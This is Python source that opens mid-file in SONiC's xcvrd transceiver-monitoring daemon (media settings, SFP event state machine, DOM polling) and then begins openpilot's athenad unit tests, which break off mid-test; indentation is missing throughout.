helper_logger.log_error("Error: No values for physical port '{}'".format(physical_port))
return {}
if key[0] in media_dict:
return media_dict[key[0]]
elif key[1] in media_dict:
return media_dict[key[1]]
elif DEFAULT_KEY in media_dict:
return media_dict[DEFAULT_KEY]
elif len(default_dict) != 0:
return default_dict
else:
if len(default_dict) != 0:
return default_dict
return {}
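# Hedged sketch of the media_settings.json shape this lookup assumes; the key and
# field names below are illustrative, not taken from a real platform file:
# {
#   "GLOBAL_MEDIA_SETTINGS": {
#     "1-32": {
#       "QSFP+-40GBASE-CR4-1M": {"preemphasis": {"lane0": "0x16", "lane1": "0x16"}},
#       "Default": {"preemphasis": {"lane0": "0x12", "lane1": "0x12"}}
#     }
#   },
#   "PORT_MEDIA_SETTINGS": {"7": {"idriver": {"lane0": "0x5"}}}
# }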
def get_media_settings_key(physical_port, transceiver_dict):
sup_compliance_str = '10/40G Ethernet Compliance Code'
sup_len_str = 'Length Cable Assembly(m)'
vendor_name_str = transceiver_dict[physical_port]['manufacturer']
vendor_pn_str = transceiver_dict[physical_port]['model']
vendor_key = vendor_name_str.upper() + '-' + vendor_pn_str
media_len = ''
if transceiver_dict[physical_port]['cable_type'] == sup_len_str:
media_len = transceiver_dict[physical_port]['cable_length']
media_compliance_dict_str = transceiver_dict[physical_port]['specification_compliance']
media_compliance_code = ''
media_type = ''
media_key = ''
media_compliance_dict = {}
try:
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
media_compliance_code = media_compliance_dict_str
else:
media_compliance_dict = ast.literal_eval(media_compliance_dict_str)
if sup_compliance_str in media_compliance_dict:
media_compliance_code = media_compliance_dict[sup_compliance_str]
except ValueError as e:
helper_logger.log_error("Invalid value for port {} 'specification_compliance': {}".format(physical_port, media_compliance_dict_str))
media_type = transceiver_dict[physical_port]['type_abbrv_name']
if len(media_type) != 0:
media_key += media_type
if len(media_compliance_code) != 0:
media_key += '-' + media_compliance_code
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
if media_compliance_code == "passive_copper_media_interface":
if len(media_len) != 0:
media_key += '-' + media_len + 'M'
else:
if len(media_len) != 0:
media_key += '-' + media_len + 'M'
else:
media_key += '-' + '*'
return [vendor_key, media_key]
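# Hedged example of the returned key pair (vendor name and part number are made up):
#   ['ACME-OPT1234', 'QSFP+-40GBASE-CR4-1M']
# i.e. [vendor_key, media_key]; the media key ends in '-*' when no cable length is known.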
def get_media_val_str_from_dict(media_dict):
LANE_STR = 'lane'
LANE_SEPARATOR = ','
media_str = ''
tmp_dict = {}
for keys in media_dict:
lane_num = int(keys.strip()[len(LANE_STR):])
tmp_dict[lane_num] = media_dict[keys]
for key in range(0, len(tmp_dict)):
media_str += tmp_dict[key]
if key != list(tmp_dict.keys())[-1]:
media_str += LANE_SEPARATOR
return media_str
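# Hedged example: get_media_val_str_from_dict({'lane0': '0x16', 'lane1': '0x18'}) -> '0x16,0x18'.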
def get_media_val_str(num_logical_ports, lane_dict, logical_idx):
LANE_STR = 'lane'
logical_media_dict = {}
num_lanes_on_port = len(lane_dict)
# The physical port has more than one logical port, meaning it is
# in breakout mode, so fetch the corresponding lanes from the file
media_val_str = ''
if (num_logical_ports > 1) and \
(num_lanes_on_port >= num_logical_ports):
num_lanes_per_logical_port = num_lanes_on_port//num_logical_ports
start_lane = logical_idx * num_lanes_per_logical_port
for lane_idx in range(start_lane, start_lane +
num_lanes_per_logical_port):
lane_idx_str = LANE_STR + str(lane_idx)
logical_lane_idx_str = LANE_STR + str(lane_idx - start_lane)
logical_media_dict[logical_lane_idx_str] = lane_dict[lane_idx_str]
media_val_str = get_media_val_str_from_dict(logical_media_dict)
else:
media_val_str = get_media_val_str_from_dict(lane_dict)
return media_val_str
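# Hedged example: with 4 lanes split across 2 logical (breakout) ports, logical index 1
# picks the upper two lanes, e.g.
#   get_media_val_str(2, {'lane0': 'a', 'lane1': 'b', 'lane2': 'c', 'lane3': 'd'}, 1) -> 'c,d'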
def notify_media_setting(logical_port_name, transceiver_dict,
app_port_tbl):
if len(media_settings) == 0:
return
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("Error: No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
logical_port_list = platform_sfputil.get_physical_to_logical(physical_port)
num_logical_ports = len(logical_port_list)
logical_idx = logical_port_list.index(logical_port_name)
if not _wrapper_get_presence(physical_port):
helper_logger.log_info("Media {} presence not detected during notify".format(physical_port))
continue
if physical_port not in transceiver_dict:
helper_logger.log_error("Media {} eeprom not populated in transceiver dict".format(physical_port))
continue
port_name = get_physical_port_name(logical_port_name,
ganged_member_num, ganged_port)
ganged_member_num += 1
key = get_media_settings_key(physical_port, transceiver_dict)
media_dict = get_media_settings_value(physical_port, key)
if len(media_dict) == 0:
helper_logger.log_error("Error in obtaining media setting for {}".format(logical_port_name))
return
fvs = swsscommon.FieldValuePairs(len(media_dict))
index = 0
for media_key in media_dict:
if type(media_dict[media_key]) is dict:
media_val_str = get_media_val_str(num_logical_ports,
media_dict[media_key],
logical_idx)
else:
media_val_str = media_dict[media_key]
fvs[index] = (str(media_key), str(media_val_str))
index += 1
app_port_tbl.set(port_name, fvs)
def waiting_time_compensation_with_sleep(time_start, time_to_wait):
time_now = time.time()
time_diff = time_now - time_start
if time_diff < time_to_wait:
time.sleep(time_to_wait - time_diff)
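# Hedged example: if the change-event call returned after 1.2 s but the budget passed in
# was 5 s, waiting_time_compensation_with_sleep(time_start, 5) sleeps for the remaining ~3.8 s.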
# Update port SFP status table on receiving SFP change event
def update_port_transceiver_status_table(logical_port_name, status_tbl, status):
fvs = swsscommon.FieldValuePairs([('status', status)])
status_tbl.set(logical_port_name, fvs)
# Delete port from SFP status table
def delete_port_from_status_table(logical_port_name, status_tbl):
status_tbl._del(logical_port_name)
# Check whether port in error status
def detect_port_in_error_status(logical_port_name, status_tbl):
rec, fvp = status_tbl.get(logical_port_name)
if rec:
status_dict = dict(fvp)
if status_dict['status'] in errors_block_eeprom_reading:
return True
else:
return False
else:
return False
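# Hedged example: a STATE_DB entry {'status': '2'} (one of the SFP error codes above)
# makes this return True, while {'status': '1'} (inserted) returns False.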
# Init TRANSCEIVER_STATUS table
def init_port_sfp_status_tbl(stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver status table
state_db, status_tbl = {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Init TRANSCEIVER_STATUS table
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_REMOVED)
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_REMOVED)
else:
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_INSERTED)
#
# Helper classes ===============================================================
#
# Thread wrapper class to update dom info periodically
class DomInfoUpdateTask(object):
def __init__(self):
self.task_thread = None
self.task_stopping_event = threading.Event()
def task_worker(self, y_cable_presence):
helper_logger.log_info("Start DOM monitoring loop")
# Connect to STATE_DB and create transceiver dom info table
state_db, dom_tbl, status_tbl = {}, {}, {}
mux_tbl = {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Start loop to update dom info in DB periodically
while not self.task_stopping_event.wait(DOM_INFO_UPDATE_PERIOD_SECS):
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
if not detect_port_in_error_status(logical_port_name, status_tbl[asic_index]):
post_port_dom_info_to_db(logical_port_name, dom_tbl[asic_index], self.task_stopping_event)
post_port_dom_threshold_info_to_db(logical_port_name, dom_tbl[asic_index], self.task_stopping_event)
if y_cable_presence[0] is True:
y_cable_helper.check_identifier_presence_and_update_mux_info_entry(state_db, mux_tbl, asic_index, logical_port_name)
helper_logger.log_info("Stop DOM monitoring loop")
def task_run(self, y_cable_presence):
if self.task_stopping_event.is_set():
return
self.task_thread = threading.Thread(target=self.task_worker, args=(y_cable_presence,))
self.task_thread.start()
def task_stop(self):
self.task_stopping_event.set()
self.task_thread.join()
# Process wrapper class to update sfp state info periodically
class SfpStateUpdateTask(object):
def __init__(self):
self.task_process = None
self.task_stopping_event = multiprocessing.Event()
def _mapping_event_from_change_event(self, status, port_dict):
"""
mapping from what get_transceiver_change_event returns to the events defined in the state machine;
the logic is pretty straightforward
"""
if status:
if bool(port_dict):
event = NORMAL_EVENT
else:
event = SYSTEM_BECOME_READY
# here, a simple timeout event whose port_dict is empty is mapped
# into a SYSTEM_BECOME_READY event so that it can be handled
port_dict[EVENT_ON_ALL_SFP] = SYSTEM_BECOME_READY
else:
if EVENT_ON_ALL_SFP in port_dict.keys():
event = port_dict[EVENT_ON_ALL_SFP]
else:
# this should not happen. just for protection
event = SYSTEM_FAIL
port_dict[EVENT_ON_ALL_SFP] = SYSTEM_FAIL
helper_logger.log_debug("mapping from {} {} to {}".format(status, port_dict, event))
return event
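# Hedged examples of the mapping above (port indices are illustrative):
#   (True,  {'1': '1'})                 -> NORMAL_EVENT
#   (True,  {})                         -> SYSTEM_BECOME_READY
#   (False, {'-1': 'system_not_ready'}) -> 'system_not_ready'
#   (False, {})                         -> SYSTEM_FAIL (protective fallback)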
def task_worker(self, stopping_event, sfp_error_event, y_cable_presence):
helper_logger.log_info("Start SFP monitoring loop")
transceiver_dict = {}
# Connect to STATE_DB and create transceiver dom/sfp info tables
state_db, appl_db, int_tbl, dom_tbl, status_tbl, app_port_tbl = {}, {}, {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Connect to APPL_DB to notify Media notifications
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
app_port_tbl[asic_id] = swsscommon.ProducerStateTable(appl_db[asic_id], swsscommon.APP_PORT_TABLE_NAME)
# Start main loop to listen to the SFP change event.
# The state migration sequence:
# 1. When the system starts, it is in the "INIT" state and calls get_transceiver_change_event
# with RETRY_PERIOD_FOR_SYSTEM_READY_MSECS as the timeout, retrying up to
# RETRY_TIMES_FOR_SYSTEM_READY times before transitioning to the "EXIT" state
# 2. Once 'system_become_ready' is returned, the system enters the "NORMAL" state and starts to monitor
# the insertion/removal events of all the SFP modules.
# In this state, receiving any system-level event is treated as an error and causes a transition to
# the "INIT" state
# 3. When the system goes back to the "INIT" state, it continues to handle system fail events and
# retries up to RETRY_TIMES_FOR_SYSTEM_READY times before transitioning to the "EXIT" state
# states definition
# - Initial state: INIT, before a system-ready or normal event has been received
# - Final state: EXIT
# - Other state: NORMAL, after a system-ready or normal event has been received
# events definition
# - SYSTEM_NOT_READY
# - SYSTEM_BECOME_READY
# -
# - NORMAL_EVENT
# - sfp insertion/removal
# - timeout returned by sfputil.get_change_event with status = true
# - SYSTEM_FAIL
# State transition:
# 1. SYSTEM_NOT_READY
# - INIT
# - retry < RETRY_TIMES_FOR_SYSTEM_READY
# retry ++
# - else
# max retry reached, treat as fatal, transition to EXIT
# - NORMAL
# Treat as an error, transition to INIT
# 2. SYSTEM_BECOME_READY
# - INIT
# transition to NORMAL
# - NORMAL
# log the event
# nop
# 3. NORMAL_EVENT
# - INIT (for the vendors who don't implement SYSTEM_BECOME_READY)
# transition to NORMAL
# handle the event normally
# - NORMAL
# handle the event normally
# 4. SYSTEM_FAIL
# - INIT
# - retry < RETRY_TIMES_FOR_SYSTEM_READY
# retry ++
# - else
# max retry reached, treat as fatal, transition to EXIT
# - NORMAL
# Treat as an error, transition to INIT
# State         event                  next state
# INIT          SYSTEM NOT READY       INIT / EXIT
# INIT          SYSTEM FAIL            INIT / EXIT
# INIT          SYSTEM BECOME READY    NORMAL
# NORMAL        SYSTEM BECOME READY    NORMAL
# NORMAL        SYSTEM FAIL            INIT
# INIT/NORMAL   NORMAL EVENT           NORMAL
# NORMAL        SYSTEM NOT READY       INIT
# EXIT          -
retry = 0
timeout = RETRY_PERIOD_FOR_SYSTEM_READY_MSECS
state = STATE_INIT
while not stopping_event.is_set():
next_state = state
time_start = time.time()
status, port_dict = _wrapper_get_transceiver_change_event(timeout)
if not port_dict:
continue
helper_logger.log_debug("Got event {} {} in state {}".format(status, port_dict, state))
event = self._mapping_event_from_change_event(status, port_dict)
if event == SYSTEM_NOT_READY:
if state == STATE_INIT:
# system not ready, wait and retry
if retry >= RETRY_TIMES_FOR_SYSTEM_READY:
helper_logger.log_error("System failed to get ready in {} secs or received system error. Exiting...".format(
(RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000)*RETRY_TIMES_FOR_SYSTEM_READY))
next_state = STATE_EXIT
sfp_error_event.set()
else:
retry = retry + 1
# get_transceiver_change_event may return immediately,
# but we want each retry to take the expected time period,
# so calculate the elapsed time and, if it is less than
# the pre-defined waiting time, sleep for the remainder.
time_now = time.time()
time_diff = time_now - time_start
if time_diff < RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000:
time.sleep(RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000 - time_diff)
elif state == STATE_NORMAL:
helper_logger.log_error("Got system_not_ready in normal state, treat as fatal. Exiting...")
next_state = STATE_EXIT
else:
next_state = STATE_EXIT
elif event == SYSTEM_BECOME_READY:
if state == STATE_INIT:
next_state = STATE_NORMAL
helper_logger.log_info("Got system_become_ready in init state, transition to normal state")
elif state == STATE_NORMAL:
helper_logger.log_info("Got system_become_ready in normal state, ignored")
else:
next_state = STATE_EXIT
elif event == NORMAL_EVENT:
if state == STATE_NORMAL or state == STATE_INIT:
if state == STATE_INIT:
next_state = STATE_NORMAL
# this is the original logic that handled the transceiver change event
# this can be reached in two cases:
# 1. the state was already NORMAL before the event was received
# 2. the state was INIT and transitioned to NORMAL after the event was received;
# this is for vendors who don't implement the "system_not_ready/system_become_ready" logic
for key, value in port_dict.items():
logical_port_list = platform_sfputil.get_physical_to_logical(int(key))
if logical_port_list is None:
helper_logger.log_warning("Got unknown FP port index {}, ignored".format(key))
continue
for logical_port in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port))
continue
if value == SFP_STATUS_INSERTED:
helper_logger.log_info("Got SFP inserted event")
# A plug-in event will clear the error state.
update_port_transceiver_status_table(
logical_port, status_tbl[asic_index], SFP_STATUS_INSERTED)
helper_logger.log_info("receive plug in and update port sfp status table.")
rc = post_port_sfp_info_to_db(logical_port, int_tbl[asic_index], transceiver_dict)
# If we didn't get the sfp info, assume the EEPROM is not ready and try once more.
if rc == SFP_EEPROM_NOT_READY:
helper_logger.log_warning("SFP EEPROM is not ready. One more try...")
time.sleep(TIME_FOR_SFP_READY_SECS)
post_port_sfp_info_to_db(logical_port, int_tbl[asic_index], transceiver_dict)
post_port_dom_info_to_db(logical_port, dom_tbl[asic_index])
post_port_dom_threshold_info_to_db(logical_port, dom_tbl[asic_index])
notify_media_setting(logical_port, transceiver_dict, app_port_tbl[asic_index])
transceiver_dict.clear()
elif value == SFP_STATUS_REMOVED:
helper_logger.log_info("Got SFP removed event")
update_port_transceiver_status_table(
logical_port, status_tbl[asic_index], SFP_STATUS_REMOVED)
helper_logger.log_info("receive plug out and pdate port sfp status table.")
del_port_sfp_dom_info_from_db(logical_port, int_tbl[asic_index], dom_tbl[asic_index])
elif value in errors_block_eeprom_reading:
helper_logger.log_info("Got SFP Error event")
# Add port to error table to stop accessing eeprom of it
# If the port already in the error table, the stored error code will
# be updated to the new one.
update_port_transceiver_status_table(logical_port, status_tbl[asic_index], value)
helper_logger.log_info("receive error update port sfp status table.")
# In this case EEPROM is not accessible, so remove the DOM info
# since it will be outdated if long time no update.
# but will keep the interface info in the DB since it static.
del_port_sfp_dom_info_from_db(logical_port, None, dom_tbl[asic_index])
else:
# SFP returned an unknown event, just ignore it for now.
helper_logger.log_warning("Got unknown event {}, ignored".format(value))
continue
# Since ports could be connected to a mux cable, if there is a change event process the change for being on a Y cable Port
y_cable_helper.change_ports_status_for_y_cable_change_event(
port_dict, y_cable_presence, stopping_event)
else:
next_state = STATE_EXIT
elif event == SYSTEM_FAIL:
if state == STATE_INIT:
# To handle the case where the system is only temporarily unavailable:
# on a system fail event, wait and retry for a certain period.
# If the system recovers within this period, xcvrd stays in the INIT state
# and continues to run; if it cannot recover, it exits.
if retry >= RETRY_TIMES_FOR_SYSTEM_FAIL:
helper_logger.log_error("System failed to recover in {} secs. Exiting...".format(
(RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS/1000)*RETRY_TIMES_FOR_SYSTEM_FAIL))
next_state = STATE_EXIT
sfp_error_event.set()
else:
retry = retry + 1
waiting_time_compensation_with_sleep(time_start, RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS/1000)
elif state == STATE_NORMAL:
helper_logger.log_error("Got system_fail in normal state, treat as error, transition to INIT...")
next_state = STATE_INIT
timeout = RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS
retry = 0
else:
next_state = STATE_EXIT
else:
helper_logger.log_warning("Got unknown event {} on state {}.".format(event, state))
if next_state != state:
helper_logger.log_debug("State transition from {} to {}".format(state, next_state))
state = next_state
if next_state == STATE_EXIT:
os.kill(os.getppid(), signal.SIGTERM)
break
elif next_state == STATE_NORMAL:
timeout = 0
helper_logger.log_info("Stop SFP monitoring loop")
def task_run(self, sfp_error_event, y_cable_presence):
if self.task_stopping_event.is_set():
return
self.task_process = multiprocessing.Process(target=self.task_worker, args=(
self.task_stopping_event, sfp_error_event, y_cable_presence))
self.task_process.start()
def task_stop(self):
self.task_stopping_event.set()
os.kill(self.task_process.pid, signal.SIGKILL)
#
# Daemon =======================================================================
#
class DaemonXcvrd(daemon_base.DaemonBase):
def __init__(self, log_identifier):
super(DaemonXcvrd, self).__init__(log_identifier)
self.timeout = XCVRD_MAIN_THREAD_SLEEP_SECS
self.num_asics = multi_asic.get_num_asics()
self.stop_event = threading.Event()
self.sfp_error_event = multiprocessing.Event()
self.y_cable_presence = [False]
# Signal handler
def signal_handler(self, sig, frame):
if sig == signal.SIGHUP:
self.log_info("Caught SIGHUP - ignoring...")
elif sig == signal.SIGINT:
self.log_info("Caught SIGINT - exiting...")
self.stop_event.set()
elif sig == signal.SIGTERM:
self.log_info("Caught SIGTERM - exiting...")
self.stop_event.set()
else:
self.log_warning("Caught unhandled signal '" + sig + "'")
# Wait until port config is done
def wait_for_port_config_done(self, namespace):
# Connect to APPL_DB and subscribe to PORT table notifications
appl_db = daemon_base.db_connect("APPL_DB", namespace=namespace)
sel = swsscommon.Select()
sst = swsscommon.SubscriberStateTable(appl_db, swsscommon.APP_PORT_TABLE_NAME)
sel.addSelectable(sst)
# Make sure this daemon starts only after all ports are configured
while not self.stop_event.is_set():
(state, c) = sel.select(SELECT_TIMEOUT_MSECS)
if state == swsscommon.Select.TIMEOUT:
continue
if state != swsscommon.Select.OBJECT:
self.log_warning("sel.select() did not return swsscommon.Select.OBJECT")
continue
(key, op, fvp) = sst.pop()
if key in ["PortConfigDone", "PortInitDone"]:
break
def load_media_settings(self):
global media_settings
global g_dict
(platform_path, hwsku_path) = device_info.get_paths_to_platform_and_hwsku_dirs()
media_settings_file_path = os.path.join(platform_path, "media_settings.json")
if not os.path.isfile(media_settings_file_path):
self.log_info("xcvrd: No media file exists")
return {}
media_file = open(media_settings_file_path, "r")
media_settings = media_file.read()
g_dict = json.loads(media_settings)
# Initialize daemon
def init(self):
global platform_sfputil
global platform_chassis
self.log_info("Start daemon init...")
# Load new platform api class
try:
import sonic_platform.platform
import sonic_platform_base.sonic_sfp.sfputilhelper
platform_chassis = sonic_platform.platform.Platform().get_chassis()
self.log_info("chassis loaded {}".format(platform_chassis))
# we have to make use of sfputil for some features
# even when the new platform api is used for all vendors.
# in this sense, we treat it as a part of the new platform api.
# we have already moved sfputil to sonic_platform_base,
# which is the root of the new platform api.
platform_sfputil = sonic_platform_base.sonic_sfp.sfputilhelper.SfpUtilHelper()
except Exception as e:
self.log_warning("Failed to load chassis due to {}".format(repr(e)))
# Load platform specific sfputil class
if platform_chassis is None or platform_sfputil is None:
try:
platform_sfputil = self.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
except Exception as e:
self.log_error("Failed to load sfputil: {}".format(str(e)), True)
sys.exit(SFPUTIL_LOAD_ERROR)
if multi_asic.is_multi_asic():
# Load the namespace details first from the database_global.json file.
swsscommon.SonicDBConfig.initializeGlobalConfig()
# Load port info
try:
if multi_asic.is_multi_asic():
# For multi ASIC platforms we pass DIR of port_config_file_path and the number of asics
(platform_path, hwsku_path) = device_info.get_paths_to_platform_and_hwsku_dirs()
platform_sfputil.read_all_porttab_mappings(hwsku_path, self.num_asics)
else:
# For single ASIC platforms we pass port_config_file_path and the asic_inst as 0
port_config_file_path = device_info.get_path_to_port_config_file()
platform_sfputil.read_porttab_mappings(port_config_file_path, 0)
except Exception as e:
self.log_error("Failed to read port info: {}".format(str(e)), True)
sys.exit(PORT_CONFIG_LOAD_ERROR)
# Connect to STATE_DB and create transceiver dom/sfp info tables
state_db, self.int_tbl, self.dom_tbl, self.status_tbl = {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
self.int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
self.dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
self.status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
self.load_media_settings()
warmstart = swsscommon.WarmStart()
warmstart.initialize("xcvrd", "pmon")
warmstart.checkWarmStart("xcvrd", "pmon", False)
is_warm_start = warmstart.isWarmStart()
# Make sure this daemon starts only after all ports are configured
self.log_info("Waiting for port config to be done")
for namespace in namespaces:
self.wait_for_port_config_done(namespace)
# Post all the current interface dom/sfp info to STATE_DB
self.log_info("Post all port DOM/SFP info to DB")
post_port_sfp_dom_info_to_db(is_warm_start, self.stop_event)
# Init port sfp status table
self.log_info("Init port sfp status table")
init_port_sfp_status_tbl(self.stop_event)
# Init port y_cable status table
y_cable_helper.init_ports_status_for_y_cable(
platform_sfputil, platform_chassis, self.y_cable_presence, self.stop_event)
# Deinitialize daemon
def deinit(self):
self.log_info("Start daemon deinit...")
# Delete all the information from DB and then exit
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
del_port_sfp_dom_info_from_db(logical_port_name, self.int_tbl[asic_index], self.dom_tbl[asic_index])
delete_port_from_status_table(logical_port_name, self.status_tbl[asic_index])
if self.y_cable_presence[0] is True:
y_cable_helper.delete_ports_status_for_y_cable()
# Run daemon
def run(self):
self.log_info("Starting up...")
# Start daemon initialization sequence
self.init()
# Start the dom sensor info update thread
dom_info_update = DomInfoUpdateTask()
dom_info_update.task_run(self.y_cable_presence)
# Start the sfp state info update process
sfp_state_update = SfpStateUpdateTask()
sfp_state_update.task_run(self.sfp_error_event, self.y_cable_presence)
# Start the Y-cable state info update process if Y cable presence established
y_cable_state_update = None
if self.y_cable_presence[0] is True:
y_cable_state_update = y_cable_helper.YCableTableUpdateTask()
y_cable_state_update.task_run()
# Start main loop
self.log_info("Start daemon main loop")
while not self.stop_event.wait(self.timeout):
# Check the integrity of the sfp info table and recover the missing entries if any
recover_missing_sfp_table_entries(platform_sfputil, self.int_tbl, self.status_tbl, self.stop_event)
self.log_info("Stop daemon main loop")
# Stop the dom sensor info update thread
dom_info_update.task_stop()
# Stop the sfp state info update process
sfp_state_update.task_stop()
# Stop the Y-cable state info update process
if self.y_cable_presence[0] is True:
y_cable_state_update.task_stop()
# Start daemon deinitialization sequence
self.deinit()
self.log_info("Shutting down...")
if self.sfp_error_event.is_set():
sys.exit(SFP_SYSTEM_ERROR)
#
# Main =========================================================================
#
# This is our main entry point for xcvrd script
def main():
xcvrd = DaemonXcvrd(SYSLOG_IDENTIFIER)
xcvrd.run()
if __name__ == '__main__':
main()
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import shutil
import tempfile
import time
import threading
import queue
import unittest
from datetime import datetime, timedelta
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from system import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.Params = MockParams
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = {cls.SOCKET_PORT}
def setUp(self):
MockParams.restore_defaults()
athenad.upload_queue = queue.Queue()
athenad.cur_upload_items.clear()
athenad.cancelled_uploads.clear()
for i in os.listdir(athenad.ROOT):
p = os.path.join(athenad.ROOT, i)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.unlink(p)
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
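# Note: polls for up to 5 seconds until the upload queue drains; callers still sleep
# briefly afterwards to give the worker time to finish the in-flight item.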
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
route = '2021-03-29--13-32-47'
segments = [0, 1, 2, 3, 11]
filenames = ['qlog', 'qcamera.ts', 'rlog', 'fcamera.hevc', 'ecamera.hevc', 'dcamera.hevc']
files = [f'{route}--{s}/{f}' for s in segments for f in filenames]
for file in files:
fn = os.path.join(athenad.ROOT, file)
os.makedirs(os.path.dirname(fn), exist_ok=True)
Path(fn).touch()
resp = dispatcher["listDataDirectory"]()
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, files)
resp = dispatcher["listDataDirectory"](f'{route}--123')
self.assertCountEqual(resp, [])
prefix = f'{route}'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/q'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
def test_strip_bz2_extension(self):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
if fn.endswith('.bz2'):
self.assertEqual(athenad.strip_bz2_extension(fn), fn[:-4])
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
